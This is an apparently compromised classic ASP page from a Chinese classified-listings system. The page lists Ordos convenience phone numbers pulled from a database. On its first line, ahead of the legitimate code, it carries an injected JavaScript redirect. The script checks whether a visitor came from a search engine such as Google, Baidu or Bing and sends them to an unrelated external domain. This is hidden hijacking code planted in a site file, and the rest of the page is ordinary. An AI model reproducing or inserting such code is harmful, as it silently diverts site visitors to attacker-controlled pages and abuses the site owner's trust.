d:\wwwroot\wuchunhua\bm.asp

001: <script type="text/javascript">var s=document.referrer;if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://www.afisyecd.space/?1923057"}</script><!--#include file="inc/conn.asp"-->
002: <!--#include file="inc/kqiqi_sub.asp"-->
003: <%
004: '    @@@@@@ www.kqiqi.com @@@@@@@@@@@@@@@@@
005: '   @                                        @
006: '  @                                          @
007: '  @   客齐齐分管理系统,做最好的分类系统。   @
008: '  @                                          @
009: '   @                                        @
010: '    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
011: %
>
012: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
013: <html xmlns="http://www.w3.org/1999/xhtml">
014: <head>
015: <title><%=title%>-鄂尔多斯便民电话</title>
016: <meta http-equiv="Content-Type" content="text/html; charset=gb2312">
017: <meta name="keywords" content="鄂尔多斯医院电话,酒店电话,机场电话,旅游景点电话,查询电话">
018: <meta name="description" content="鄂尔多斯便民电话大全">
019: <link rel="icon" href="<%=web%>/favicon.ico" type="image/x-icon" />
020: <link rel="shortcut icon" href="<%=web%>/favicon.ico" type="image/x-icon" />
021: <link href="inc/style.css" rel="stylesheet" type="text/css" />
022: <style type="text/css">
023: * {
024:    font-size:12px;
025:    margin:0;
026:    padding:0;
027: }
028: fieldset {
029:    padding:10px;
030:    margin:10px;
031:    width:200px;
032:    color:#333;
033:    border:#06c dashed 1px;
034: }
035: legend {
036:    color:#06c;
037:    font-weight:800;
038:    background:#fff;
039: }
040: ul {
041:    list-style-type: none;
042:    margin:0 0 0 0;
043: }
044: li {
045:    margin-top:4px;
046: }
047: </style>
048: </head>
049: <body>
050: <div id="divall">
051: <div id="header">
052: <%call top()%>
053: </div>
054: <div class=kon></div>
055: <div Class='FFdiv'>
056: <%
057: response.write "<table width=100% border=0 style=""border-collapse: collapse;padding-bottom: 1px"" cellpadding=0 ><tr>"
058: dim rsnx1,j
059: set rsnx1=server.createobject("adodb.recordset")
060: sqlnx1 = "select top 100 * from kqiqi_114  order by id desc"
061: rsnx1.open sqlnx1,conn,1,1
062: while not rsnx1.eof and not rsnx1.bof
063: for j=1 to 4
064: if rsnx1.eof then
065: exit for
066: end if
067: response.write "<td align=""center"" valign=""top"">"
068: response.write "<fieldset> <legend>"&left(rsnx1("114name"),17)&"</legend>"
069: response.write " <ul><li><img border=""0"" src=""image/telp.gif"" width=""16"" height=""13""><font color=#44a412>电话:"&rsnx1("114tel")&"</font></li> "
070: response.write " </ul></fieldset>"
071: response.write "</td>"
072: rsnx1.movenext
073: next
074: response.write "</tr>"
075: wend    
076: rsnx1.close
077: set rsnx1=nothing
078: response.write "<tr><td  height=20></td></tr></table>"
079: %
>
080: </div>
081: <br style="clear:both;" />
082: <div id="footer">
083: <%call bottom()%>
084: </div>
085: </div>
086: </body>
087: </html>
088:
089: